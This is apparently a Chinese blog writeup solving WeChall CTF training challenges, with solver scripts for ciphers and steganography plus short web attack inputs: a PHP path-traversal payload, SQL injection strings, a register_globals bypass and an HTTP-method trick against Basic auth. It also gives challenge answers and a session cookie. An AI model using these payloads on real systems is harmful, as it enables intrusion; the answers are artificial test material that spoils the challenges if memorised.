wechall writeup

2018/08/19 CTF CTF 11660 words views

国外的一个 CTF 网站,挺多人做这个的,这篇就记录 wechall 上题目的 writeup,持续更新……

1.Training: Get Sourced

查看源码

2.Training: Stegano I

用文本编辑器查看图片

3.Training: Crypto - Caesar I

一般的凯撒密码

4.Training: WWW-Robots

robots.txt

5.Training: ASCII

ascii 转换

6.Encodings: URL

url 解码

7.Prime Factory

def isPrime(num):
    for i in range(2, int(num**0.5)+1):
        if num % i == 0:
            return False
    return True


count = 2
res = ""
for num in range(1000000, 2000000):
    if isPrime(num):
        s = str(num)
        data = 0
        for i in range(len(s)):
            data += int(s[i])
        if isPrime(data):
            print s
            res += s
            count -= 1
            if count == 0:
                break
        
print res

8.Training: Encodings I

掌握一下 wechall 赠送的 Java 小程序的使用

9.Training: Programming 1

就是不能手动来

#coding: utf-8
import requests

url1 = "https://www.wechall.net/challenge/training/programming1/index.php?action=request"
url2 = "https://www.wechall.net/challenge/training/programming1/index.php?answer={}"
rq = requests.Session()

cookies = dict(cookies_are='gsScrollPos-1723=; gsScrollPos-3680=0; WC=10718669-41869-tIrWzQ3iD9EFBssa')
response1 = rq.get(url1, cookies=cookies)

url2 = url2.format(response1.text)
response2 = rq.get(url2, cookies=cookies)

print(response2.text)

10.Training: Regex

/^$/
/^wechall$/
/^wechall4?\.(?:jpg|gif|tiff|png|bmp)$/
#注意这里是只匹配:wechall4.tiff, wechall.png, wechall4.jpg, wechall.bmp,不能匹配其他的。
#(?:exp) => 匹配exp,不捕获匹配的文本,也不给此分组分配组号

/^(wechall4?)\.(?:jpg|gif|tiff|png|bmp)$/

11.Training: PHP LFI

/challenge/training/php/lfi/up/index.php?file=../../solution.php%00

12.PHP 0817

如果switch是数字类型的case的判断时,switch会将其中的参数转换为int类型。

?which=solution

switch 在这里会将 solution 转换成 0, 从而绕过。

13.Training: Crypto - Transposition I

到这里来https://www.dcode.fr/transposition-cipher

BY KNOWING THE KEY LENGTH => 选择 4

14.Training: Crypto - Substitution I

单表替换密码: https://quipqiup.com/ 答案要转小写

15.Training: Crypto - Caesar II

a = """
6C 14 14 09 20 0F 14 07 51 20 1E 14 1A 20 18 14
11 1B 0A 09 20 14 13 0A 20 12 14 17 0A 20 08 0D
06 11 11 0A 13 0C 0A 20 0E 13 20 1E 14 1A 17 20
0F 14 1A 17 13 0A 1E 53 20 79 0D 0E 18 20 14 13
0A 20 1C 06 18 20 0B 06 0E 17 11 1E 20 0A 06 18
1E 20 19 14 20 08 17 06 08 10 53 20 7C 06 18 13
4C 19 20 0E 19 64 20 56 57 5D 20 10 0A 1E 18 20
0E 18 20 06 20 16 1A 0E 19 0A 20 18 12 06 11 11
20 10 0A 1E 18 15 06 08 0A 51 20 18 14 20 0E 19
20 18 0D 14 1A 11 09 13 4C 19 20 0D 06 1B 0A 20
19 06 10 0A 13 20 1E 14 1A 20 19 14 14 20 11 14
13 0C 20 19 14 20 09 0A 08 17 1E 15 19 20 19 0D
0E 18 20 12 0A 18 18 06 0C 0A 53 20 7C 0A 11 11
20 09 14 13 0A 51 20 1E 14 1A 17 20 18 14 11 1A
19 0E 14 13 20 0E 18 20 0B 12 14 17 11 18 14 13
09 0B 0A 13 53
"""
a = a.replace("\n", " ")
print(a)
data = a.split(" ")
print(data)

while "" in data:
	data.remove("")

print(data)

# 26-128
for k in range(0, 129):
	res = ""
	for i in range(len(data)):
		tmp = int(data[i], 16)
		if tmp + k > 128:
			ch = chr(tmp + k - 128)
		else:	
			ch = chr(tmp + k)
		res += ch
	print(res)
	print("#############################################################")

16.Training: Crypto - Digraphs

先猜第一个对应的单词是congratulations,然后建立字典慢慢玩下去,跟数独有点像。

#coding: utf-8
a = "uansbneeuqxirstnvnxirsjznsbntvgj ninstn ggwkffuqyuqprswkgg rsejjztv iowktvtvxieewk tvtnffffwktvtvpftnvnvnyugj vexitv bnnsrs rsnsns ggjzpfpfjzfftnvnrs wkjzrsejwkuqex xyxitv jzrsqb vewkvnvnex eensnsgg fxnssugj kvbnrswkuq rsejjztv oqwkyuxynsuqgg xitv tvnsvntnrsjznsbnjt vnvnnseejzpfpfvnpfejejpfgj"
data = a.split(" ")

data_A = {}
ans = "congratulations"

for i in range(len(ans)):
	tmp = data[0][2*i]
	tmp += data[0][2*i+1]
	data_A[tmp] = ans[i]

print data_A

#这里程序先运行一下再天剑这里
data_A["ni"] = "y"
data_A["ej"] = "h"
data_A["gg"] = "d"
data_A["io"] = "m"
data_A["wk"] = "e"
data_A["pf"] = "f"
data_A["ff"] = "c"
data_A["gj"] = "!"


for i in range(len(data)):
	res = ""
	for k in range(len(data[i])/2):
		tmp = data[i][2*k]
		tmp += data[i][2*k+1]
		if data_A.has_key(tmp):
			res += data_A[tmp]
		else:
			res += "*"	
	print res

17.Training: MySQL I

admin'#&1

18.Training: MySQL II

' union select md5(1),'admin',md5(1)#&1

19.Training: WWW-Basics

这道题需要搭建服务器,如果在本地搭建需要在路由器上进行设置,我这里暂且不行。其次可以用代理的方式,可以设置全局代理,这里这道题目识别的就是你代理服务器的 IP 了,然后在代理服务器上新建相应的文件。(这里要注意要使用 SS 的话,代理服务器不能是国内大陆的)。注意: 用 XFF 欺骗欺骗不了。

20.Training: Register Globals

//注意这道题目: register_globals = on
if (isset($login))
{
        echo GWF_HTML::message('Register Globals', $chall->lang('msg_welcome_back', 			array(htmlspecialchars($login[0]), htmlspecialchars($login[1]))));
        if (strtolower($login[0]) === 'admin') {
                $chall->onChallengeSolved(GWF_Session::getUserID());
        }
}

所以只要?login[0]=admin

21.Training: Math Pyramid

a^3/18^.5

分子有理化,这道题很贱啊

22.Training: Baconian

培根密码 => 到这里解密

#coding: utf-8
"""
a = "BaCoN's cIphEr or THE bacOnIAN CiPHer iS a meThOD oF sTEGaNOGrapHY (a METhoD Of HidIng A sECRet MeSsaGe as OpPOsEd TO a TRUe CiPHeR) dEVIseD BY francis bAcoN. a MessAge Is coNCeALED in THe pRESenTatIoN OF TexT, ratHer thaN iTs coNteNt. tO enCODe A MEsSaGe, eaCh lETter Of THe pLAInText Is rePLAcED By A groUp oF fIvE OF thE LEtTers 'a' oR 'B'. this rEPlaCemENt Is done acCOrdiNg To THE alPHAbeT OF tHe BACOnIAN cIpHeR, sHoWn bElOw. NoTe: A SeCoNd vErSiOn oF BaCoN'S CiPhEr uSeS A UnIqUe cOdE FoR EaCh lEtTeR. iN OtHeR WoRdS, i aNd j eAcH HaS ItS OwN PaTtErN. tHe wRiTeR MuSt mAkE UsE Of tWo dIfFeReNt tYpEfAcEs fOr tHiS CiPhEr. AfTeR PrEpArInG A FaLsE MeSsAgE WiTh tHe sAmE NuMbEr oF LeTtErS As aLl oF ThE As aNd bS In tHe rEaL, sEcReT MeSsAgE, tWo tYpEfAcEs aRe cHoSeN, oNe tO RePrEsEnT As aNd tHe oThEr bS. tHeN EaCh lEtTeR Of tHe fAlSe mEsSaGe mUsT Be pReSeNtEd iN ThE ApPrOpRiAtE TyPeFaCe, AcCoRdInG To wHeThEr iT StAnDs fOr aN A Or a b. To dEcOdE ThE MeSsAgE, tHe rEvErSe mEtHoD Is aPpLiEd. EaCh 'TyPeFaCe 1' LeTtEr iN ThE FaLsE MeSsAgE Is rEpLaCeD WiTh aN A AnD EaCh 'TyPeFaCe 2' LeTtEr iS RePlAcEd wItH A B. tHe bAcOnIaN AlPhAbEt iS ThEn uSeD To rEcOvEr tHe oRiGiNaL MeSsAgE. aNy mEtHoD Of wRiTiNg tHe mEsSaGe tHaT AlLoWs tWo dIsTiNcT RePrEsEnTaTiOnS FoR EaCh cHaRaCtEr cAn bE UsEd fOr tHe bAcOn cIpHeR. bAcOn hImSeLf pRePaReD A BiLiTeRaL AlPhAbEt[2] FoR HaNdWrItTeN CaPiTaL AnD SmAlL LeTtErS WiTh eAcH HaViNg tWo aLtErNaTiVe fOrMs, OnE To bE UsEd aS A AnD ThE OtHeR As b. ThIs wAs pUbLiShEd aS An iLlUsTrAtEd pLaTe iN HiS De aUgMeNtIs sCiEnTiArUm (ThE AdVaNcEmEnT Of lEaRnInG). BeCaUsE AnY MeSsAgE Of tHe rIgHt lEnGtH CaN Be uSeD To cArRy tHe eNcOdInG, tHe sEcReT MeSsAgE Is eFfEcTiVeLy hIdDeN In pLaIn sIgHt. ThE FaLsE MeSsAgE CaN Be oN AnY ToPiC AnD ThUs cAn dIsTrAcT A PeRsOn sEeKiNg tO FiNd tHe rEaL MeSsAgE."
a = list(a)


for i in range(len(a)):
	if 'A' <= a[i] <= 'Z':
		a[i] = 'b'
	elif 'a' <= a[i] <= 'z':
		a[i] = 'a'
	else:
		a[i] = ""
print "".join(a)

"""
res = "VERYXWELLXDONEXFELLOWXHACKERXTHEXSECRETXKEYWORDXISXHIGBSNAGFOOOXXKVFKSUJOUWKWWURNWVFNFWJKSVEWVLKXLKJNJVMTMTEVLKUVJFKNKZEUVUVSKKSZKTNKWVKVSUSOEVWVJKKZKVKVJWWVSVUVKVJVJOSVVJUWKSKWVJLFJFJNJFLKVLNFKJUSKKVFJKKVNKWVWWVUWUSVJKZUWWKJKTFKSTMVJKVNKWKWVWVSKKFSSKVFNLFKSWKKWWVWNVWSKXKKTJFV"

res = res.replace("X", " ").lower()
print res

23.Training: LSB

一道隐写题,使用官方的 Java 小程序 steganabara 来解的。之前都是直接跳过的,这里参考这里

LSB(The least significant bit)

24.Training: GPG

这道题比较琐碎,参考这里来做的,还有阮一峰老师关于 gpg 的一篇文章GPG入门教程

我开始在 kali 下做,按照步骤一步一步来开始是没啥问题,但是收到 wechall 邮件一直解密不了,报错

gpg: WARNING: no command supplied.  Trying to guess what you mean ...
gpg: no valid OpenPGP data found.
gpg: processing message failed: 未知的系统错误

然后我在 Mac 上做还是遇到同样的报错,后来发现是拷贝出来之后加密数据的格式问题,邮件里的密文,凡是空格复制到文件中都要手动转成换行。

步骤:

gpg2 --gen-key

gpg2 --armor --output public-key.txt --export  "YYXXP <2281XXXX95@qq.com>"

touch secret.txt
gpg2 secret.txt

25.Limited Access

AuthUserFile .htpasswd
AuthGroupFile /dev/null
AuthName "Authorization Required for the Limited Access Challenge"
AuthType Basic
<Limit GET>
require valid-user
</Limit>

简单看下这里的源码,只对 GET 做了限制,所以我们使用 POST 访问即可

26.Limited Access Too

这道题比上一道题就是多禁了几个 http method,但是并没有禁完

GET
	GET方法请求一个指定资源的表示形式. 使用GET的请求应该只被用于获取数据.
HEAD
	HEAD方法请求一个与GET请求的响应相同的响应,但没有响应体.
POST
	POST方法用于将实体提交到指定的资源,通常导致状态或服务器上的副作用的更改. 
PUT
	PUT方法用请求有效载荷替换目标资源的所有当前表示。
DELETE
	DELETE方法删除指定的资源。
CONNECT
	CONNECT方法建立一个到由目标资源标识的服务器的隧道。
OPTIONS
	OPTIONS方法用于描述目标资源的通信选项。
TRACE
	TRACE方法沿着到目标资源的路径执行一个消息环回测试。
PATCH
	PATCH方法用于对资源应用部分修改。

//这道题我就使用 PATCH

27.Shadowlamb - Chapter I

参考这里,这里就来到一个游戏了。

我用的客户端是Texttual

Ugah made game. You play game. You #use ScrollOfWisdom.

连接的地址是: irc.gizmore.org
频道是: #shadowlamb

#exp 就是不断找小怪打,获取金币

Your attributes: body:1(2), magic:1(5), quickness:3(6), wisdom:0(2), intelligence:2(6), charisma:1(5), luck:0, reputation:0, essence:6.
#lvlup body  这个是升级的,升级一次会消耗 4 个 karma

#use FirstAid 是涨血量(HP)的

#use XXX
#eq XXX 后面跟物品代号

#ny 查看当前有多少钱
#goto Redmond_Alchemist 去这里买 flag
#use ScrollOfWisdom 就能拿到 flag

28.Training: Warchall - The Beginning

step1: 创建账号

step2: ssh -p 19198 catcher@warchall.net

此时该目录下有两个文件:level WELCOME.txt

先看看 WELCOME.txt

You will find the solution to each level in 
/home/level
or
/home/user/yournick/level

这里说有两个路径,我在 level 下确实只看到 4、5、6,那么就去/home/level 做 1、2、3。

$catcher@warchall /home/level/0 $ cat README.txt 
bitwarrior

$catcher@warchall /home/level/1 $ grep -rn "solution"*
LameStartup

$catcher@warchall /home/level/2 $ grep -rn "solution"*
.porb/.solution:1:The solution is HiddenIsConfig
grep: .ssh: 权限不够
.bash_history:8:nano .porb/.solution
$catcher@warchall /home/level/2/.porb $ ls -a
HiddenIsConfig

$catcher@warchall /home/level/3 $ grep -rn "solution"*
RepeatingHistory

补充:

grep -rn "hello,world!" *

* : 表示当前目录所有文件,也可以是某个文件名
-r 是递归查找
-n 是显示行号
-R 查找所有文件包含子目录
-i 忽略大小写

下面的 4、5、6 就要换目录了

$catcher@warchall ~/level/4 $ cat README.txt 
cat: README.txt: 权限不够
$catcher@warchall ~/level/4 $ ls -l    <=>  查看权限情况
总用量 4
---------- 1 catcher catcher 63 8月  23 15:35 README.txt

用户名和组名都是我自己,只要加一下可读即可。

$catcher@warchall ~/level/4 $ chmod 700 README.txt 
$catcher@warchall ~/level/4 $ cat README.txt 
AndIknowchown
$catcher@warchall ~/level/5 $ cat README.txt 
Protect your /home/user/catcher/level directory from other users. Then wait 5 minutes.

$catcher@warchall ~ $ ls -l
总用量 8
drwx---r-x 5 catcher catcher 4096 8月  23 15:35 level
-r--r--r-- 1 catcher catcher  463 1月  18 2014 WELCOME.txt
$catcher@warchall ~/level/5 $ cat solution.txt 
cat: solution.txt: 权限不够
$catcher@warchall ~/level/5 $ chmod 700 solution.txt
$catcher@warchall ~/level/5 $ cat solution.txt 
The solution to level 5 is 'OhRightThePerms', without the quotes.
OhRightThePerms

bitwarrior,LameStartup,HiddenIsConfig,RepeatingHistory,AndIknowchown,OhRightThePerms

pic1

参考:[WeChall] Training: Warchall – The Beginning (Realistic, Linux, Shell, Warchall)

29.Repeating History

首先去 github 该项目的地址上找到该题目的文件夹

第一部分在 repeating 文件夹下

第二部分 在 history 文件夹下,查找 install.php 的历史记录找到正确的 solution

30.PHP My Admin

这道题要看下讨论区里面给的一些提示

网上查一下一般PHPMyAdmin会放在哪个路径下。会发现 http://www.wechall.net/phpmyadmin 最多,另外 http://www.wechall.net/pma也是有人用的,因为通常就把PHPMyAdmin简称为pma。

https://pma.wechall.net/

31.Training: Caterpillar

32.AUTH me

tips:find_me路径下找到 p12证书,然后火狐浏览器中你的证书中导入该证书即可,后面要求输入密码,密码为空。

33.Interesting

34.Wanda

35.Railsbin

36.Connect the Dots

盲文密码,找到对应的盲文密码对应表即可

thesolutionisXXX

37.hi

大数的计算,发现一个在线的网站wolframalpha

38.Stegano Woman

这道题你如果用现成的工具来解压缩肯定是做不出来的。

$ unzip stegano_woman.zip

回显

Archive:  stegano_woman.zip
Stegano
	 	 	 			  	 			  		 	 		 					   		  	  	    	  	  			   	   	 			  	 		 	  	    	  	   			 						  	 		 	   		  		 		  		 			  				 	  	   		  		   	  		 	 	   		 		  	    	   	 	 	   	  		 						  	  	  	 		 	  		  		  		   	
  inflating: 1.jpg                   
  inflating: 2.jpg       

使用16进制编辑器打开,发现中间那段空白的部分是09(tab)和20(space)

把其中的一个当作1另一个当作0,换成二进制再转换成字符串之后输出即可

#coding: utf-8
with open('stegano_woman.zip','rb') as f:
    text = f.read()

index = text.find('Stegano')
# 上面这个获取的是 S 的下标

text = [x for x in text[index:] if x]
print len(text)

text = text[9:]
#['S', 't', 'e', 'g', 'a', 'n', 'o', '\r', '\n']
# 所以这里要从 9 开始

text = ''.join('1' if x==' ' else '0' for x in text)

s=""
for i in range(len(text)/8):
   s+= chr(int(text[i*8:i*8+8],2)) 

print s

Search

    Table of Contents